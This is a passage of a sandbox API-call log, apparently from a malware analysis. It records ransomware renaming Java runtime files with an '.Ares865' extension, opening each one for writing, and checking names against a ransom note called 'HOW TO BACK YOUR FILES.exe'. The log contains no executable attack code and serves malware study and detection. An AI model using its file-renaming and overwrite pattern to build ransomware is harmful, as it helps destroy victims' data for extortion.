nFileSizeHigh=0x0, nFileSizeLow=0x63a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0137.584] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0137.584] lstrcmpiW (lpString1="dt_shmem.dll", lpString2="aoldtz.exe") returned 1 [0137.584] lstrcpyW (in: lpString1=0x2cce44a, lpString2="dt_shmem.dll" | out: lpString1="dt_shmem.dll") returned="dt_shmem.dll" [0137.584] lstrlenW (lpString="dt_shmem.dll") returned 12 [0137.584] lstrlenW (lpString="Ares865") returned 7 [0137.584] lstrcmpiW (lpString1="mem.dll", lpString2="Ares865") returned 1 [0137.585] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll.Ares865") returned 57 [0137.585] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll.ares865"), dwFlags=0x1) returned 1 [0137.592] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_shmem.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_shmem.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25512) returned 1 [0137.596] lstrcpyW (in: lpString1=0x2cce44a, lpString2="dt_socket.dll" | out: lpString1="dt_socket.dll") returned="dt_socket.dll" [0137.597] lstrlenW (lpString="dt_socket.dll") returned 13 [0137.597] lstrlenW (lpString="Ares865") returned 7 [0137.597] lstrcmpiW (lpString1="ket.dll", lpString2="Ares865") returned 1 [0137.597] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll.Ares865") returned 58 [0137.597] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll.ares865"), dwFlags=0x1) returned 1 [0137.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\dt_socket.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dt_socket.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.603] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21928) returned 1 [0137.607] lstrcpyW (in: lpString1=0x2cce44a, lpString2="eula.dll" | out: lpString1="eula.dll") returned="eula.dll" [0137.607] lstrlenW (lpString="eula.dll") returned 8 [0137.607] lstrlenW (lpString="Ares865") returned 7 [0137.607] lstrcmpiW (lpString1="ula.dll", lpString2="Ares865") returned 1 [0137.607] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll.Ares865") returned 53 [0137.607] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll.ares865"), dwFlags=0x1) returned 1 [0137.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\eula.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\eula.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=108968) returned 1 [0137.623] lstrcpyW (in: lpString1=0x2cce44a, lpString2="fontmanager.dll" | out: lpString1="fontmanager.dll") returned="fontmanager.dll" [0137.623] lstrlenW (lpString="fontmanager.dll") returned 15 [0137.623] lstrlenW (lpString="Ares865") returned 7 [0137.623] lstrcmpiW (lpString1="ger.dll", lpString2="Ares865") returned 1 [0137.624] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll.Ares865") returned 60 [0137.624] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll.ares865"), dwFlags=0x1) returned 1 [0137.626] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.626] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217000) returned 1 [0137.644] lstrcpyW (in: lpString1=0x2cce44a, lpString2="fxplugins.dll" | out: lpString1="fxplugins.dll") returned="fxplugins.dll" [0137.644] lstrlenW (lpString="fxplugins.dll") returned 13 [0137.644] lstrlenW (lpString="Ares865") returned 7 [0137.644] lstrcmpiW (lpString1="ins.dll", lpString2="Ares865") returned 1 [0137.644] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll.Ares865") returned 58 [0137.644] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll.ares865"), dwFlags=0x1) returned 1 [0137.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.646] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=156584) returned 1 [0137.657] lstrcpyW (in: lpString1=0x2cce44a, lpString2="glass.dll" | out: lpString1="glass.dll") returned="glass.dll" [0137.657] lstrlenW (lpString="glass.dll") returned 9 [0137.657] lstrlenW (lpString="Ares865") returned 7 [0137.657] lstrcmpiW (lpString1="ass.dll", lpString2="Ares865") returned 1 [0137.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll.Ares865") returned 54 [0137.657] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll.ares865"), dwFlags=0x1) returned 1 [0137.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glass.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glass.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.660] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=159656) returned 1 [0137.675] lstrcpyW (in: lpString1=0x2cce44a, lpString2="glib-lite.dll" | out: lpString1="glib-lite.dll") returned="glib-lite.dll" [0137.675] lstrlenW (lpString="glib-lite.dll") returned 13 [0137.675] lstrlenW (lpString="Ares865") returned 7 [0137.675] lstrcmpiW (lpString1="ite.dll", lpString2="Ares865") returned 1 [0137.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll.Ares865") returned 58 [0137.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll.ares865"), dwFlags=0x1) returned 1 [0137.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=408488) returned 1 [0137.710] lstrcpyW (in: lpString1=0x2cce44a, lpString2="gstreamer-lite.dll" | out: lpString1="gstreamer-lite.dll") returned="gstreamer-lite.dll" [0137.710] lstrlenW (lpString="gstreamer-lite.dll") returned 18 [0137.710] lstrlenW (lpString="Ares865") returned 7 [0137.710] lstrcmpiW (lpString1="ite.dll", lpString2="Ares865") returned 1 [0137.710] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll.Ares865") returned 63 [0137.710] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll.ares865"), dwFlags=0x1) returned 1 [0137.712] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.712] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=505768) returned 1 [0137.745] lstrcpyW (in: lpString1=0x2cce44a, lpString2="hprof.dll" | out: lpString1="hprof.dll") returned="hprof.dll" [0137.745] lstrlenW (lpString="hprof.dll") returned 9 [0137.745] lstrlenW (lpString="Ares865") returned 7 [0137.745] lstrcmpiW (lpString1="rof.dll", lpString2="Ares865") returned 1 [0137.746] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll.Ares865") returned 54 [0137.746] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll.ares865"), dwFlags=0x1) returned 1 [0137.748] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=132520) returned 1 [0137.761] lstrcpyW (in: lpString1=0x2cce44a, lpString2="installer.dll" | out: lpString1="installer.dll") returned="installer.dll" [0137.761] lstrlenW (lpString="installer.dll") returned 13 [0137.761] lstrlenW (lpString="Ares865") returned 7 [0137.761] lstrcmpiW (lpString1="ler.dll", lpString2="Ares865") returned 1 [0137.763] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll.Ares865") returned 58 [0137.763] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll.ares865"), dwFlags=0x1) returned 1 [0137.765] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.765] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=207776) returned 1 [0137.780] lstrcpyW (in: lpString1=0x2cce44a, lpString2="instrument.dll" | out: lpString1="instrument.dll") returned="instrument.dll" [0137.780] lstrlenW (lpString="instrument.dll") returned 14 [0137.780] lstrlenW (lpString="Ares865") returned 7 [0137.781] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0137.781] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll.Ares865") returned 59 [0137.781] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll.ares865"), dwFlags=0x1) returned 1 [0137.783] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.783] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=115112) returned 1 [0137.794] lstrcpyW (in: lpString1=0x2cce44a, lpString2="j2pcsc.dll" | out: lpString1="j2pcsc.dll") returned="j2pcsc.dll" [0137.794] lstrlenW (lpString="j2pcsc.dll") returned 10 [0137.794] lstrlenW (lpString="Ares865") returned 7 [0137.794] lstrcmpiW (lpString1="csc.dll", lpString2="Ares865") returned 1 [0137.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll.Ares865") returned 55 [0137.795] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll.ares865"), dwFlags=0x1) returned 1 [0137.796] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16296) returned 1 [0137.800] lstrcpyW (in: lpString1=0x2cce44a, lpString2="j2pkcs11.dll" | out: lpString1="j2pkcs11.dll") returned="j2pkcs11.dll" [0137.800] lstrlenW (lpString="j2pkcs11.dll") returned 12 [0137.800] lstrlenW (lpString="Ares865") returned 7 [0137.800] lstrcmpiW (lpString1="s11.dll", lpString2="Ares865") returned 1 [0137.800] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll.Ares865") returned 57 [0137.801] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll.ares865"), dwFlags=0x1) returned 1 [0137.802] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51112) returned 1 [0137.808] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jaas_nt.dll" | out: lpString1="jaas_nt.dll") returned="jaas_nt.dll" [0137.808] lstrlenW (lpString="jaas_nt.dll") returned 11 [0137.808] lstrlenW (lpString="Ares865") returned 7 [0137.808] lstrcmpiW (lpString1="_nt.dll", lpString2="Ares865") returned -1 [0137.808] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll.Ares865") returned 56 [0137.808] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll.ares865"), dwFlags=0x1) returned 1 [0137.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jaas_nt.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jaas_nt.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19880) returned 1 [0137.817] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jabswitch.exe" | out: lpString1="jabswitch.exe") returned="jabswitch.exe" [0137.817] lstrlenW (lpString="jabswitch.exe") returned 13 [0137.817] lstrlenW (lpString="Ares865") returned 7 [0137.817] lstrcmpiW (lpString1="tch.exe", lpString2="Ares865") returned 1 [0137.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe.Ares865") returned 58 [0137.817] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe.ares865"), dwFlags=0x1) returned 1 [0137.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48040) returned 1 [0137.824] lstrcpyW (in: lpString1=0x2cce44a, lpString2="java-rmi.exe" | out: lpString1="java-rmi.exe") returned="java-rmi.exe" [0137.824] lstrlenW (lpString="java-rmi.exe") returned 12 [0137.824] lstrlenW (lpString="Ares865") returned 7 [0137.824] lstrcmpiW (lpString1="rmi.exe", lpString2="Ares865") returned 1 [0137.824] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe.Ares865") returned 57 [0137.824] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe.ares865"), dwFlags=0x1) returned 1 [0137.825] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java-rmi.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java-rmi.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0137.829] lstrcpyW (in: lpString1=0x2cce44a, lpString2="java.dll" | out: lpString1="java.dll") returned="java.dll" [0137.829] lstrlenW (lpString="java.dll") returned 8 [0137.829] lstrlenW (lpString="Ares865") returned 7 [0137.829] lstrcmpiW (lpString1="ava.dll", lpString2="Ares865") returned 1 [0137.830] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll.Ares865") returned 53 [0137.830] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll.ares865"), dwFlags=0x1) returned 1 [0137.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=120232) returned 1 [0137.841] lstrcpyW (in: lpString1=0x2cce44a, lpString2="java.exe" | out: lpString1="java.exe") returned="java.exe" [0137.841] lstrlenW (lpString="java.exe") returned 8 [0137.841] lstrlenW (lpString="Ares865") returned 7 [0137.841] lstrcmpiW (lpString1="ava.exe", lpString2="Ares865") returned 1 [0137.841] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe.Ares865") returned 53 [0137.841] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe.ares865"), dwFlags=0x1) returned 1 [0137.843] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\java.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174504) returned 1 [0137.868] lstrcpyW (in: lpString1=0x2cce44a, lpString2="JavaAccessBridge-32.dll" | out: lpString1="JavaAccessBridge-32.dll") returned="JavaAccessBridge-32.dll" [0137.868] lstrlenW (lpString="JavaAccessBridge-32.dll") returned 23 [0137.868] lstrlenW (lpString="Ares865") returned 7 [0137.868] lstrcmpiW (lpString1="-32.dll", lpString2="Ares865") returned -1 [0137.869] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll.Ares865") returned 68 [0137.869] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll.ares865"), dwFlags=0x1) returned 1 [0137.871] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\JavaAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaaccessbridge-32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=124840) returned 1 [0137.883] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javacpl.exe" | out: lpString1="javacpl.exe") returned="javacpl.exe" [0137.883] lstrlenW (lpString="javacpl.exe") returned 11 [0137.883] lstrlenW (lpString="Ares865") returned 7 [0137.883] lstrcmpiW (lpString1="cpl.exe", lpString2="Ares865") returned 1 [0137.884] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe.Ares865") returned 56 [0137.884] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe.ares865"), dwFlags=0x1) returned 1 [0137.886] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0137.886] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=66984) returned 1 [0137.894] lstrcpyW (in: lpString1=0x2cce44a, lpString2="javafx-font.dll" | out: lpString1="javafx-font.dll") returned="javafx-font.dll" [0137.894] lstrlenW (lpString="javafx-font.dll") returned 15 [0137.894] lstrlenW (lpString="Ares865") returned 7 [0137.894] lstrcmpiW (lpString1="ont.dll", lpString2="Ares865") returned 1 [0137.894] wsprintfW (in: 